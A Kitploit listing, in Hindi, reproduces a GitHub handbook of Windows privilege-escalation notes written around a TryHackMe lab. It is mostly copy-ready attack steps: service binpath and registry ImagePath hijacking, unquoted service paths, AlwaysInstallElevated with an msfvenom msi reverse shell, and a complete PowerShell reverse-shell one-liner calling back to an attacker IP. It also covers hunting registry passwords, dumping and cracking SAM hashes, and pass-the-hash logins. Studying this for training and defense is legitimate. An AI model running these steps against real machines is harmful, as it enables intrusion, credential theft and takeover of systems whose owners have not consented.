Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Windows-Privilege-Escalation-Notes — विंडोज़ विशेषाधिकार वृद्धि (Privilege Escalation) अवधारणाओं के लिए मेरी हैंडबुक। मेरी प्लेलिस्ट ज़रूर देखें, लिंक: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk | Kitploit
उपकरण/GitHubGitHub/saisathvik1/windows-privilege-escalation-notes
विशेषाधिकार वृद्धिपासवर्ड हमलेशोषणजानकारी एकत्र करनापोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
saisathvik1/windows-privilege-escalation-notes

Windows-Privilege-Escalation-Notes

विंडोज़ विशेषाधिकार वृद्धि (Privilege Escalation) अवधारणाओं के लिए मेरी हैंडबुक। मेरी प्लेलिस्ट ज़रूर देखें, लिंक: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk

रिपॉजिटरी देखें
591434 साल पहलेKitploit द्वारा समीक्षित

Windows Privilege Escalation

  • पसंदीदा रूम है https://tryhackme.com/room/windows10privesc, लेकिन आप अपनी पसंद की कोई भी चीज़ उपयोग कर सकते हैं।
  • कुछ संसाधन,
    • https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
    • https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html
    • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
    • https://www.fuzzysecurity.com/tutorials/16.html

विंडोज़ मशीनों में खातों के प्रकार:

  • Administrator (स्थानीय): यह सबसे अधिक विशेषाधिकारों वाला उपयोगकर्ता है।
  • Standard (स्थानीय): ये उपयोगकर्ता कंप्यूटर तक पहुँच सकते हैं लेकिन केवल सीमित कार्य ही कर सकते हैं। सामान्यतः ये उपयोगकर्ता सिस्टम में स्थायी या आवश्यक परिवर्तन नहीं कर सकते।
  • Guest: यह खाता सिस्टम तक पहुँच प्रदान करता है लेकिन इसे उपयोगकर्ता के रूप में परिभाषित नहीं किया गया है।
  • Standard (डोमेन): Active Directory संगठनों को उपयोगकर्ता खातों को प्रबंधित करने की अनुमति देता है। एक मानक डोमेन खाते में स्थानीय प्रशासक विशेषाधिकार हो सकते हैं।
  • Administrator (डोमेन): इसे सबसे अधिक विशेषाधिकार प्राप्त उपयोगकर्ता माना जा सकता है। यह संगठन के डोमेन में अन्य उपयोगकर्ताओं को संपादित, बना और हटा सकता है।
  • SYSTEM : यह विशेष रूप से कोई खाता नहीं है, लेकिन विंडोज़ सेवाएँ अपने कार्य को करने के लिए इस खाते का उपयोग करती हैं, लेकिन इस खाते के पास भी उच्च विशेषाधिकार होते हैं।

ध्यान देने योग्य एक महत्वपूर्ण बात है Groups, Administrator समूह का कोई भी उपयोगकर्ता हमें एस्केलेट करने में मदद करता है!


सूचना एकत्रित करना:

  • सबसे अच्छे संसाधनों में से एक: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
  1. whoami /priv - वर्तमान उपयोगकर्ता के विशेषाधिकार
  2. net users - सभी उपयोगकर्ताओं की सूची
  3. net user <username> - किसी विशिष्ट उपयोगकर्ता का विवरण
  4. qwinsta - अन्य उपयोगकर्ता जो एक साथ लॉग इन हैं
  5. net localgroup - सिस्टम में उपलब्ध समूह
  6. net localgroup <group-name> - किसी विशिष्ट समूह के सदस्यों की सूची
  7. systeminfo - OS के बारे में सभी जानकारी देता है
  8. hostname - सिस्टम का होस्टनाम
  9. findstr /si password *.txt - हम उन फ़ाइलों की तलाश कर रहे हैं जिनमें 'password' शामिल है, वह भी टेक्स्ट फ़ाइलों में
  10. wmic qfe get Caption,Description,HotFixID,InstalledOn - यह सुरक्षा पैच और संबंधित जानकारी के बारे में बताता है
  11. netstat -ano - मशीन से जुड़े कनेक्शन
  12. schtasks /query /fo LIST /v - किसी भी निर्धारित कार्य को देखने के लिए

Windows Exploit Suggester:

  • यह एक प्रसिद्ध उपकरण है जिसे ज़्यादातर लोग उपयोग करते हैं
  • इस उपकरण की मदद से हम इंटरनेट पर मौजूद 60% बॉक्स हल कर सकते हैं
  • लिंक: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  • बस systeminfo उपकरण के आउटपुट की एक कॉपी अपनी मशीन पर रखें और यही इस उपकरण के लिए एकमात्र आवश्यकता है
  • प्रो टिप: सुनिश्चित करें कि सभी निर्भरताएँ पूरी हों!

असुरक्षित सॉफ्टवेयर:

  • यहाँ हम इंस्टॉल किए गए सॉफ्टवेयर का संस्करण ढूँढने की कोशिश करेंगे और देखेंगे कि यह असुरक्षित है या नहीं
  • wmic product get name,version,vendor - यह उत्पाद का नाम, संस्करण और विक्रेता देता है। यह विशेष कमांड हमें जो चाहिए उसका उचित दृश्य प्रदान करता है।
  • कभी-कभी उपरोक्त कमांड काम नहीं कर सकता इसलिए wmic service list brief | findstr "Running" का उपयोग करें और सेवा के बारे में अधिक जानकारी प्राप्त करने के लिए sc qc <ServiceName> का उपयोग करें


Metasploit के माध्यम से विशेषाधिकार एस्केलेशन:

  • Metasploit में सेशन मिलने के बाद, post/multi/recon/local_exploit_suggester नामक मॉड्यूल चलाएँ, सुनिश्चित करें कि आपका सेशन बैकग्राउंड में है ताकि यह टूल ठीक से काम करे या आप इसे meterpreter से भी लोड कर सकते हैं।
  • फिर यह कुछ ऐसे मॉड्यूल सुझाएगा जिन्हें एक्सप्लॉइट किया जा सकता है, उन्हें आज़माएँ और उनमें से कुछ काम कर सकते हैं (वैकल्पिक)।


WinPEAS:

  • यह एक स्वचालित एन्यूमरेशन स्क्रिप्ट है जो काफी उपयोगी है।
  • सर्वोत्तम उपयोग के लिए winpeas.exe --help चलाकर सभी विकल्प देखें
  • केवल आवश्यक विकल्प चलाएँ और आउटपुट को ट्यून करें।


Kernel Exploit:

  • Windows Exploit Suggester नामक इस विशेष उपकरण का उपयोग करें
  • सबसे पहले systeminfo कमांड चलाकर सिस्टम की जानकारी प्राप्त करें और उसे किसी फ़ाइल में कॉपी करें तथा उसे .txt एक्सटेंशन के साथ नाम दें
  • अब डेटाबेस का उपयोग करके टूल को चलाएँ
  • यहाँ कर्नेल से संबंधित एक्सप्लॉइट्स देखें।
  • हैप्पी हैकिंग!!


सेवा एक्सप्लॉइट्स:

असुरक्षित सेवा अनुमतियाँ:

  • यहाँ हम असुरक्षित अनुमतियों वाली सेवाओं की पहचान करने की कोशिश करेंगे और फिर उन्हें एक्सप्लॉइट करने का प्रयास कर सकते हैं।

  • यहाँ हम winpeas.exe servicesinfo कमांड का उपयोग कर सकते हैं और उन सेवाओं को देख सकते हैं जो काफी सहायक होती हैं

  • आउटपुट का एक दिलचस्प हिस्सा इस प्रकार है,```

    daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: ChangeConfig

root@kitploit:~
- लेकिन अधिक जानकारी प्राप्त करने के लिए हम **accesschk** नामक एक टूल का उपयोग कर सकते हैं जो Microsoft द्वारा है, इसे इस प्रकार चलाएँ `accesschk.exe /accepteula -uwcqv <current-user> <service>`, आउटपुट है,```
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL

  • लेकिन मुख्य भाग service_change_config है जहाँ हम सेवा का कॉन्फ़िगरेशन बदल सकते हैं।
  • sc qc <service> चलाएँ और फिर Binary_path_name (इसे binpath भी कहा जाता है) नोट करें, जिसे हम बदलने वाले हैं (बुरी मुस्कान)
  • अब एक shell प्रकार का payload बनाएँ और उसे लक्षित मशीन पर स्थानांतरित करें
  • कॉन्फ़िग बदलने का सिंटैक्स, sc config <service> <option>="<value>"
  • अब sc config daclsvc binpath="<path>" चलाएँ और फिर सेवा शुरू करें sc start daclsvc

अनकोटेड सर्विस पाथ:(USP)

  • सेवाओं के लिए पथ को उद्धरणों में होना आवश्यक है, यदि यह ऐसे enclosed नहीं है तो हम इस loophole का फायदा उठाकर उच्च विशेषाधिकार प्राप्त कर सकते हैं।``` Vulnerability Insight: The Windows API must assume where to find the referenced application if the path contains spaces and is not enclosed by quotation marks. If, for example, a service uses the unquoted path:

Vulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe

The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.

C:\Program.exe C:\Program Files\Ignite.exe C:\Program Files\Ignite Data\Vuln.exe C:\Program Files\Ignite Data\Vuln Service\file.exe

root@kitploit:~
- अधिक जानकारी प्राप्त करने के लिए बस **WinPEAS** स्क्रिप्ट का उपयोग `servicesinfo` विकल्प के साथ करें, यहाँ हम देख सकते हैं कि क्या हम किसी **Unquoted Service Path** का शोषण कर सकते हैं, यहाँ मैंने टूल चलाया और आउटपुट का दिलचस्प हिस्सा इस प्रकार है,```
unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected  
  • यहाँ आउटपुट स्पष्ट रूप से बताता है कि कोई उद्धरण और स्पेस का पता नहीं चला इसलिए हम निष्कर्ष निकाल सकते हैं कि हम इस विशेष सेवा का शोषण USP का उपयोग करके कर सकते हैं
  • और सेवा के बारे में अधिक जानकारी प्राप्त करने के लिए sc qc <service> का उपयोग करें
  • अब आइए इस विशेष स्थान C:\Program Files\Unquoted Path Service की अनुमति को accesschk का उपयोग करके जाँचें, इसलिए accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service" चलाएँ। आउटपुट:``` accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service" C:\Program Files\Unquoted Path Service Medium Mandatory Level (Default) [No-Write-Up] RW BUILTIN\Users RW NT SERVICE\TrustedInstaller RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators
root@kitploit:~
- हमारे पास पढ़ने और लिखने की अनुमति है।
- अब हम एक पेलोड बनाएंगे और उसे `C:\Program Files\Unquoted Path Service` में पेस्ट करेंगे, `copy reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"` के माध्यम से, यहाँ मैं एक अलग नाम से नामकरण कर रहा हूँ जिसका वर्णानुक्रम (alphabetical order) के साथ भी कुछ लाभ है।
- अब सेवा शुरू करें, `sc start unquotedsvc`, हम एडमिन हैं!!!

-----------------------
### कमजोर रजिस्ट्री अनुमतियाँ (Weak Registry Permissions):
- यहाँ हम कमजोर रजिस्ट्री अनुमतियों वाली सेवाओं का फायदा उठाने की कोशिश करेंगे।
- खोजने के लिए हमें `Winpeas` का उपयोग `servicesinfo` विकल्प के साथ करना होगा। आउटपुट कुछ इस प्रकार दिखता है।```
����������͹ Looking if you can modify any service registry
� Check if you can modify the registry of a service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions                                                                                          
    HKLM\system\currentcontrolset\services\regsvc (Interactive [FullControl])

अब हम सेवा का नाम लेते हैं जो regsvc है, तो आइए इस सेवा के बारे में गहराई से जानें, इसलिए sc qc regsvc चलाएँ और आउटपुट है,``` sc qc regsvc [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: regsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Insecure Registry Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

root@kitploit:~
- एक अच्छी बात यह है कि पथ कोट्स में है इसलिए **Unquoted Service Path** नहीं है।
- अब `accesschk.exe` चलाते हैं और गहराई से जांचते हैं, इसलिए `accesschk /acceptula -uvwqk <path of registry>` चलाएँ (जो `HKLM\system\currentcontrolset\services\regsvc` है)
- आउटपुट में `RW NT AUTHORITY\INTERACTIVE(KEY_ALL_ACCESS)` देखें और अब हम exploit करने के लिए तैयार हैं।
- अब `reg query HKLM\system\currentcontrolset\services\regsvc` का उपयोग करके रजिस्ट्री के विकल्प देखते हैं और मुझे `ImagePath` नामक एक विकल्प मिला जो executable मान लेता है, तो चलिए इसका exploit करते हैं। सबसे पहले एक reverse-shell बनाएँ।
- अब `reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f` चलाएँ, अपनी आवश्यकता के अनुसार payload का पथ चुनें।
- अब सेवा चलाएँ, `net start regsvc` और हुर्रे! मुझे shell मिल गया।

-----------------------
### असुरक्षित सेवा एक्ज़ीक्यूटेबल:
- यहाँ सेवा की फ़ाइल अनुमतियाँ सभी के लिए सुलभ हैं! हम सेवा के एक्ज़ीक्यूटेबल को बदलने की कोशिश करते हैं और हम तैयार हैं!
- चलिए **Winpeas** को विशेष रूप से **servicesinfo** मॉड्यूल के साथ चलाते हैं और देखते हैं कि कुछ दिलचस्प है, और आउटपुट है,```
filepermsvc(File Permissions Service)["C:\Program Files\File Permissions Service\filepermservice.exe"] - Manual - Stopped
    File Permissions: Everyone [AllAccess]

  • सभी के पास सेवा filepermsvc के लिए फ़ाइल तक पहुंच है, इसलिए हम एक reverse_shell पेलोड बनाएंगे और उसे सेवा के एक्ज़ीक्यूटेबल के साथ बदल देंगे और हमें शेल मिल जाएगा।
  • यह ऊपर की तुलना में थोड़ा आसान है।


Registry

  • यहाँ हम जानकारी प्राप्त करने के लिए Registry का उपयोग करते हैं और हम exploit करने का प्रयास करेंगे!
  • हम सिर्फ उन सुविधाओं की जाँच कर रहे हैं जिनका दुरुपयोग किया जा सकता है

Autoruns:

  • Autoruns विंडोज़ में एक सुविधा है जो स्टार्टअप के दौरान कुछ सेवाओं या एप्लिकेशन को प्रारंभ करती है, उदाहरण के लिए "greenshot"
  • हम उन्हें मैन्युअल रूप से reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run चलाकर जांच सकते हैं - यह ऑटोरन प्रोग्राम और उनके पथ प्रदर्शित करेगा।
  • आउटपुट है,``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SecurityHealth REG_EXPAND_SZ %windir%\system32\SecurityHealthSystray.exe My Program REG_SZ "C:\Program Files\Autorun Program\program.exe"
root@kitploit:~
हमें 2 प्रोग्राम पाथ के साथ मिले हैं तो चलिए टेस्ट करते हैं।
- अब हम **accesscheck** चलाएँगे ताकि पता चले कि इन ऑटोरन्स के फ़ाइल-पाथ पर कौन-सी अनुमतियाँ उपलब्ध हैं
- बस `accesschk.exe \accepteula -wvu "<path>"` चलाएँ, मैंने इसे **My Program** ऑटोरन के पाथ के लिए चलाया और आउटपुट में `FILE_ALL_ACCESS` दिखा, तो हम इस फ़ोल्डर में शाब्दिक रूप से कुछ भी कर सकते हैं। मुख्य रूप से हम मूल एक्ज़ीक्यूटेबल को बदल सकते हैं और सिस्टम को रीस्टार्ट कर सकते हैं और हमें शेल मिल सकता है।
- नहीं, हमें एडमिन लॉगिन तक इंतज़ार करना होगा और हमें विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में शेल मिलेगा!
- यहाँ मुख्य बात यह है कि हमें एडमिन/मालिक के लॉगिन तक इंतज़ार करना होगा वरना हम आगे बढ़ने के लिए तैयार हैं!

------------------------------
### AlwaysInstallElevated
- यह सामान्य उपयोगकर्ता को प्रशासनिक विशेषाधिकारों के साथ **msi**(Microsoft Installer) इंस्टॉल करने की अनुमति देता है।
- यह उच्च विशेषाधिकार प्राप्त करने का एक शानदार और आसान तरीका है,
- हम इसे चलाकर जाँच सकते हैं,
`reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
` और
`reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
`
- इन दोनों कमांड्स को चलाएँ और **AlwaysInstallElevated** का मान 1 या 0x1 होना चाहिए। ताकि हम पुष्टि कर सकें और आगे बढ़ सकें।
- अब **msi** प्रारूप का रिवर्स-शेल बनाएँ, संदर्भ के लिए नीचे दिए गए कमांड को देखें,
`msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.13.39.50 LPORT=4444 --platform windows -f msi > reverse.msi`
- अब उसे विंडोज़ मशीन पर ट्रांसफर करें और कमांड चलाएँ,
`msiexec /quiet /qn /i reverse.msi`
- वाह! हमें `nt authority\system` के रूप में शेल मिल गया

------------------
-------------------
## पासवर्ड्स:
- यहाँ हम रजिस्ट्री, फ़ाइलों आदि में क्रेडेंशियल्स देखते हैं
- और हम लॉगिन करने का प्रयास करेंगे!

----------------------
### रजिस्ट्री में पासवर्ड खोजना:
- हम रजिस्ट्री में पासवर्ड खोज सकते हैं, कभी-कभी हमें अन्य उपयोगकर्ताओं के पासवर्ड या यहाँ तक कि मालिक का पासवर्ड भी मिल सकता है।
- `reg query HKLM /f password /t REG_SZ /s` चलाएँ, यह रजिस्ट्री में सभी विवरण देता है जिसमें **password** स्ट्रिंग होती है, खोजें और आपको वह मिल सकता है! लेकिन दुखद बात यह है कि मैं कुछ भी प्राप्त नहीं कर सका!
- साथ ही `reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
` चलाएँ, हमें कुछ जानकारी मिल सकती है।
- हम अपने प्रसिद्ध टूल **winPEAS** का भी उपयोग कर सकते हैं, इसे कुछ विकल्पों के साथ चलाएँ जैसे `windowscreds` - क्रेडेंशियल्स खोजता है, और `filesinfo` - फ़ाइलों और रजिस्ट्री में उपयोगी डेटा(कभी-कभी पासवर्ड भी) देखता है
- पासवर्ड प्राप्त करने के बाद यहाँ यह `password123` है, तो अब चलिए **psexec**(लिंक: https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py) की मदद से लॉगिन करते हैं और सिंटैक्स है `python3 psexec.py [email protected]`, फिर यह पासवर्ड माँगेगा, इसे बताएँ और हमें एडमिन की तरह एक्सेस मिल जाएगा!

-------------------------
### पासवर्ड्स : Savedcreds
- सबसे पहले `cmdkey /list` चलाएँ, यहाँ **cmdkey** एक विंडोज़-सर्वर एप्लिकेशन है जो *संग्रहीत उपयोगकर्ता नाम और पासवर्ड या क्रेडेंशियल्स बनाता, सूचीबद्ध करता और हटाता है*। इसे चलाकर हम देख सकते हैं कि उपयोगकर्ताओं के कौन-कौन से क्रेडेंशियल्स सहेजे गए हैं!
- आउटपुट है,```
Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic 
    User: 02nfpgrklkitqatu
    Local machine persistence
    
    Target: Domain:interactive=WIN-QBA94KB3IOF\admin
    Type: Domain Password
    User: WIN-QBA94KB3IOF\admin
  • हम उपयोगकर्ता admin को देख सकते हैं, तो चलिए runas उपयोगिता का उपयोग करते हैं। यह एक उपयोगकर्ता को उपयोगकर्ता के वर्तमान लॉगऑन द्वारा प्रदान की गई अनुमतियों से भिन्न अनुमतियों के साथ विशिष्ट टूल और प्रोग्राम चलाने की अनुमति देता है।
  • चलिए runas /savecred /user:admin C:\Temp\reverse.exe चलाते हैं, यह हमें एडमिन विशेषाधिकार देगा

पासवर्ड: SAM (सिक्योरिटी अकाउंट्स मैनेजर)

  • SAM में विंडोज़ पासवर्ड के NTLM हैश होते हैं, हमारे पास उन्हें क्रैक करने का मौका होता है, लेकिन यह हमेशा मददगार नहीं हो सकता क्योंकि हम हैश से निपट रहे हैं!
  • लेकिन इस विधि को जानना निश्चित रूप से मदद करेगा।
  • और 99% बार SAM फ़ाइल को सामान्य विशेषाधिकारों के साथ एक्सेस नहीं किया जा सकता है, लेकिन यहाँ बॉक्स में लेखक ने C:\Windows\Repair निर्देशिका में SAM फ़ाइल की एक प्रति बनाई है, ताकि हम खेल सकें! यहाँ उस निर्देशिका में 2 फ़ाइलें हैं, अर्थात्, SAM और SYSTEM
  • हमें दोनों फ़ाइलें प्राप्त करने की आवश्यकता है ताकि हम creddump7(https://github.com/CiscoCXSecurity/creddump7) नामक टूल के साथ उपयोग कर सकें। मैंने उन्हें meterpreter download कमांड की मदद से प्राप्त किया
  • अब क्लोन करने के बाद निम्न कमांड चलाएँ python2 pwdump.py /opt/work/SYSTEM /opt/work/SAM, यह अब विंडोज़ मशीन पर उपलब्ध उपयोगकर्ताओं के हैश प्रदर्शित करेगा। आउटपुट है,``` Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2::: user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a::: admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
root@kitploit:~
- अब उपरोक्त सामग्री को एक टेक्स्ट फ़ाइल में सहेजें और अब इसे **JohnTheRipper** की सहायता से क्रैक करें, सिंटैक्स है `john --format=NT hashes.txt --wordlist=/usr/share/wordlist/rockyou.txt`, और यह क्रैक हो गया!```
password123      (admin)     
password321      (user)     
Passw0rd!        (Administrator)  

पासवर्ड: Pass the hash हमला

  • मान लेते हैं कि हम हैश को क्रैक नहीं कर पा रहे हैं क्योंकि यह वर्डलिस्ट में नहीं है, तो हम इस हमले Pass the hash का उपयोग कर सकते हैं, जो हमें हैश की मदद से प्रमाणीकरण (authenticate) करने की अनुमति देता है!
  • तो हैश प्राप्त करें, यहाँ admin के रूप में लॉगिन करते हैं जिसका हैश a9fdfa038c4b75ebc76dc855dd74f0da है
  • पहले export करें, export SMBHASH=aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da यहाँ हम groupid के साथ भी हैश का उपयोग कर रहे हैं
  • फिर pth-winexe -U admin% //10.10.213.97 cmd.exe चलाएं, मुझे admin के रूप में शेल मिला
  • टूल pth-winexe kali में पहले से उपलब्ध है।
  • अटक जाएँ तो यह देखें: https://www.whitelist1.com/2017/10/pass-hash-pth-attack-with-pth-winexe.html


शेड्यूल्ड टास्क का शोषण:

  • जैसे Linux में होते हैं, वैसे ही Windows में भी शेड्यूल्ड टास्क होते हैं।
  • सभी शेड्यूल्ड टास्क देखने के लिए schtasks /query /fo LIST /V चलाएँ
  • यहाँ CleanUp.ps1 दिलचस्प लग रहा है और पथ है C:\DevTools\CleanUp.ps1
  • तो देखते हैं कि हम इस स्थान के साथ-साथ उस फ़ाइल के साथ क्या कर सकते हैं, accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1 और हमारे पास पढ़ने, लिखने...आदि की सभी अनुमतियाँ हैं
  • कार्य के विवरण में प्रक्रिया थोड़ी अलग है इसलिए मैंने एक powershell-reverseshell खोजा, जो है,``` $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
root@kitploit:~
- फिर मैंने ट्रांसफर किया और `CleanUp.ps1` के रूप में नाम बदला और मुझे कनेक्शन मिल गया।

--------------------
---------------------
## असुरक्षित GUI ऐप्स:
- RDP कनेक्शन मिलने के बाद `Taskmanager` खोलें और वहाँ `Details` टैब में हम उन एप्लिकेशन और उपयोगकर्ता को देख सकते हैं, जो इसे चला रहा है।
- यहाँ उन्होंने जानबूझकर `mspaint.exe` को admin के रूप में चलाने के लिए कॉन्फ़िगर किया है, इसलिए यह हमारा लक्ष्य होगा।
- चूँकि हम **Paint** के साथ काम कर रहे हैं, हमारे पास फ़ाइलें खोलने का विकल्प होगा, इसलिए हम `file://c:/windows/system32/cmd.exe` खोलेंगे और धमाका! हमें **admin** उपयोगकर्ता के रूप में shell मिल जाता है!
- यहाँ कार्यक्षमता थोड़ी सीमित है क्योंकि हमें हमेशा RDP कनेक्शन नहीं मिल सकता।

-----------------------
----------------------
## स्टार्टअप ऐप्स:
- विंडोज़ में एक फीचर होता है जो कुछ ऐप्स को स्टार्टअप में चलाने की अनुमति देता है, हम इस फीचर का दुरुपयोग कर सकते हैं।
- स्टार्टअप ऐप्स `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp` में मिलते हैं, यह डिफ़ॉल्ट पथ है।
- आइए देखें कि हम **accesschk.exe** के माध्यम से क्या कर सकते हैं, इसलिए `accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"` चलाएँ। आउटपुट है,```
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
  RW WIN-QBA94KB3IOF\Administrator
  RW WIN-QBA94KB3IOF\admin
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  Everyone
  • यहाँ एक स्क्रिप्ट है जिसे CreateShortcut.vbs कहा जाता है जो एडमिन विशेषाधिकारों के साथ चलती है और इसका मुख्य उद्देश्य उस रिवर्स-शेल के लिए एक shortcut बनाना है जिसे हमने अपलोड किया था।
  • पेलोड ट्रांसफर करें और स्क्रिप्ट चलाएं, अब हमें तब तक इंतज़ार करना होगा जब तक एडमिन लॉगिन न कर ले और फिर हमें शेल मिल जाएगा।
  • यह दुर्लभ है और इसके माध्यम से एक्सप्लॉइट करने की संभावना कम है।


टोकन इम्पर्सनेशन:

  • टोकन कंप्यूटर के लिए कुकीज़ की तरह होते हैं, इसका लाभ यह है कि हमें किसी भी नेटवर्क से कनेक्ट करने के लिए हर बार क्रेडेंशियल्स बताने की आवश्यकता नहीं होती...आदि।
  • टोकन 2 प्रकार के होते हैं,
  1. डेलीगेट टोकन: किसी मशीन में लॉगिन करने या RDP उपयोग करने के लिए बनाया जाता है।
  2. इम्पर्सनेट टोकन: नॉन-इंटरैक्टिव, नेटवर्क ड्राइव या डोमेन लॉगन स्क्रिप्ट अटैच करने के लिए उपयोग किया जाता है।
  • हम सभी टोकन को list_tokens -u चलाकर देख सकते हैं, वह भी meterpreter सेशन में, बाद में कुछ अच्छा टोकन मिलने पर impersonate_token <name of token> चलाएँ।
  • इसके अलावा हम whomai /priv चला सकते हैं और हम वर्तमान उपयोगकर्ता के विशेषाधिकार देख सकते हैं, वहाँ यदि हमें SeAssignPrimaryToken...आदि जैसा कोई विशेषाधिकार मिले, जो काफी खतरनाक होते हैं, यह बहुत खतरनाक है! इन विशेषाधिकारों के बारे में और इन्हें कैसे एक्सप्लॉइट करें, यह जानने के लिए यह लेख देखें: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---impersonation-privileges

Potato Attacks:

  • इस हमले के लिए गाइड है: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
  • और जो पेलोड हम उपयोग कर सकते हैं वह है: https://github.com/ohpe/juicy-potato
  • यहाँ हम NT Authority/System जैसी एक्सेस प्राप्त करने की कोशिश करते हैं। [अभी भी प्रगति पर.....]
टूल डाउनलोड करें
  • driverquery - ड्राइवर से संबंधित जानकारी की सूची
  • sc query windefend - एंटीवायरस सेवा की जाँच करता है